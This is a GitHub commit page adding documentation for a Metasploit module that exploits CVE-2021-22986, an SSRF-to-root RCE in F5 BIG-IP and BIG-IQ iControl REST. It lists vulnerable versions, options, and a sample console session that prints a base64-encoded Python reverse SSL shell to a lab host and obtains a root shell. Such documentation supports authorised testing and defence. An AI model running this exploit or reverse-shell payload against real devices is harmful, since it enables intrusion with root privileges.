Skip to content

Commit 2cbd1a6

Browse files
space-r7space-r7
committed
Land rapid7#14935, add F5 iControl REST API SSRF RCE
2 parents 6549c12 + 69a0c94 commit 2cbd1a6

File tree

2 files changed

+448
-0
lines changed

2 files changed

+448
-0
lines changed

documentation/modules/exploit/linux/http/f5_icontrol_rest_ssrf_rce.md

Lines changed: 122 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,122 @@
1+
## Vulnerable Application
2+
3+
### Description
4+
5+
This module exploits a pre-auth SSRF in the F5 iControl REST API's
6+
`/mgmt/shared/authn/login` endpoint to generate an `X-F5-Auth-Token` that
7+
can be used to execute root commands on an affected BIG-IP or BIG-IQ
8+
device. This vulnerability is known as CVE-2021-22986.
9+
10+
CVE-2021-22986 affects the following BIG-IP versions:
11+
12+
* 12.1.0 - 12.1.5
13+
* 13.1.0 - 13.1.3
14+
* 14.1.0 - 14.1.3
15+
* 15.1.0 - 15.1.2
16+
* 16.0.0 - 16.0.1
17+
18+
And the following BIG-IQ versions:
19+
20+
* 6.0.0 - 6.1.0
21+
* 7.0.0
22+
* 7.1.0
23+
24+
Tested against BIG-IP Virtual Edition 16.0.1 in VMware Fusion.
25+
26+
### Setup
27+
28+
Import a vulnerable BIG-IP or BIG-IQ OVA, such as
29+
`BIGIP-16.0.1-0.0.3.ALL-vmware.ova`, into your desired hypervisor. Boot
30+
the virtual appliance, and it should be exploitable out of the box once
31+
it's up.
32+
33+
## Verification Steps
34+
35+
Follow [Setup](#setup) and [Scenarios](#scenarios).
36+
37+
## Targets
38+
39+
### 0
40+
41+
This executes a Unix command.
42+
43+
### 1
44+
45+
This uses a Linux dropper to execute code.
46+
47+
## Options
48+
49+
### USERNAME
50+
51+
Set this to a valid admin username. Defaults to `admin`.
52+
53+
### ENDPOINT
54+
55+
Set this to a custom token generation endpoint. Random if unset.
56+
57+
## Scenarios
58+
59+
### BIG-IP Virtual Edition 16.0.1 in VMware Fusion
60+
61+
```
62+
msf6 > use exploit/linux/http/f5_icontrol_rest_ssrf_rce
63+
[*] Using configured payload cmd/unix/reverse_python_ssl
64+
msf6 exploit(linux/http/f5_icontrol_rest_ssrf_rce) > options
65+
66+
Module options (exploit/linux/http/f5_icontrol_rest_ssrf_rce):
67+
68+
Name Current Setting Required Description
69+
---- --------------- -------- -----------
70+
ENDPOINT no Custom token generation endpoint
71+
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
72+
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
73+
RPORT 443 yes The target port (TCP)
74+
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
75+
SRVPORT 8080 yes The local port to listen on.
76+
SSL true no Negotiate SSL/TLS for outgoing connections
77+
SSLCert no Path to a custom SSL certificate (default is randomly generated)
78+
TARGETURI / yes Base path
79+
URIPATH no The URI to use for this exploit (default is random)
80+
USERNAME admin yes Valid admin username
81+
VHOST no HTTP server virtual host
82+
83+
84+
Payload options (cmd/unix/reverse_python_ssl):
85+
86+
Name Current Setting Required Description
87+
---- --------------- -------- -----------
88+
LHOST yes The listen address (an interface may be specified)
89+
LPORT 4444 yes The listen port
90+
91+
92+
Exploit target:
93+
94+
Id Name
95+
-- ----
96+
0 Unix Command
97+
98+
99+
msf6 exploit(linux/http/f5_icontrol_rest_ssrf_rce) > set rhosts 192.168.123.134
100+
rhosts => 192.168.123.134
101+
msf6 exploit(linux/http/f5_icontrol_rest_ssrf_rce) > set lhost 192.168.123.1
102+
lhost => 192.168.123.1
103+
msf6 exploit(linux/http/f5_icontrol_rest_ssrf_rce) > run
104+
105+
[+] python -c "exec(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zLHNzbApzbz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSkKc28uY29ubmVjdCgoJzE5Mi4xNjguMTIzLjEnLDQ0NDQpKQpzPXNzbC53cmFwX3NvY2tldChzbykKcU49RmFsc2UKd2hpbGUgbm90IHFOOgoJZGF0YT1zLnJlY3YoMTAyNCkKCWlmIGxlbihkYXRhKT09MDoKCQlxTiA9IFRydWUKCXByb2M9c3VicHJvY2Vzcy5Qb3BlbihkYXRhLHNoZWxsPVRydWUsc3Rkb3V0PXN1YnByb2Nlc3MuUElQRSxzdGRlcnI9c3VicHJvY2Vzcy5QSVBFLHN0ZGluPXN1YnByb2Nlc3MuUElQRSkKCXN0ZG91dF92YWx1ZT1wcm9jLnN0ZG91dC5yZWFkKCkgKyBwcm9jLnN0ZGVyci5yZWFkKCkKCXMuc2VuZChzdGRvdXRfdmFsdWUpCg==')[0]))"
106+
[*] Started reverse SSL handler on 192.168.123.1:4444
107+
[*] Executing automatic check (disable AutoCheck to override)
108+
[*] Generating token via SSRF...
109+
[*] Username: admin
110+
[*] Endpoint: /tm/analytics/proc-cpu/generate-report/indexing
111+
[+] Successfully generated token: CDDASK5TXQN246AJVZNAAPM7NS
112+
[+] The target is vulnerable.
113+
[*] Executing Unix Command for cmd/unix/reverse_python_ssl
114+
[*] Executing command: eval $(echo cHl0aG9uIC1jICJleGVjKF9faW1wb3J0X18oJ2Jhc2U2NCcpLmI2NGRlY29kZShfX2ltcG9ydF9fKCdjb2RlY3MnKS5nZXRlbmNvZGVyKCd1dGYtOCcpKCdhVzF3YjNKMElITnZZMnRsZEN4emRXSndjbTlqWlhOekxHOXpMSE56YkFwemJ6MXpiMk5yWlhRdWMyOWphMlYwS0hOdlkydGxkQzVCUmw5SlRrVlVMSE52WTJ0bGRDNVRUME5MWDFOVVVrVkJUU2tLYzI4dVkyOXVibVZqZENnb0p6RTVNaTR4TmpndU1USXpMakVuTERRME5EUXBLUXB6UFhOemJDNTNjbUZ3WDNOdlkydGxkQ2h6YnlrS1NIazlSbUZzYzJVS2QyaHBiR1VnYm05MElFaDVPZ29KWkdGMFlUMXpMbkpsWTNZb01UQXlOQ2tLQ1dsbUlHeGxiaWhrWVhSaEtUMDlNRG9LQ1FsSWVTQTlJRlJ5ZFdVS0NYQnliMk05YzNWaWNISnZZMlZ6Y3k1UWIzQmxiaWhrWVhSaExITm9aV3hzUFZSeWRXVXNjM1JrYjNWMFBYTjFZbkJ5YjJObGMzTXVVRWxRUlN4emRHUmxjbkk5YzNWaWNISnZZMlZ6Y3k1UVNWQkZMSE4wWkdsdVBYTjFZbkJ5YjJObGMzTXVVRWxRUlNrS0NYTjBaRzkxZEY5MllXeDFaVDF3Y205akxuTjBaRzkxZEM1eVpXRmtLQ2tnS3lCd2NtOWpMbk4wWkdWeWNpNXlaV0ZrS0NrS0NYTXVjMlZ1WkNoemRHUnZkWFJmZG1Gc2RXVXBDZz09JylbMF0pKSI= | base64 -d)
115+
[*] Command shell session 1 opened (192.168.123.1:4444 -> 192.168.123.134:40632) at 2021-03-30 17:30:28 -0500
116+
[!] Command execution timed out
117+
118+
id
119+
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:initrc_t:s0
120+
uname -a
121+
Linux localhost.localdomain 3.10.0-862.14.4.el7.ve.x86_64 #1 SMP Tue Oct 20 10:03:05 PDT 2020 x86_64 x86_64 x86_64 GNU/Linux
122+
```

0 commit comments

Comments
 (0)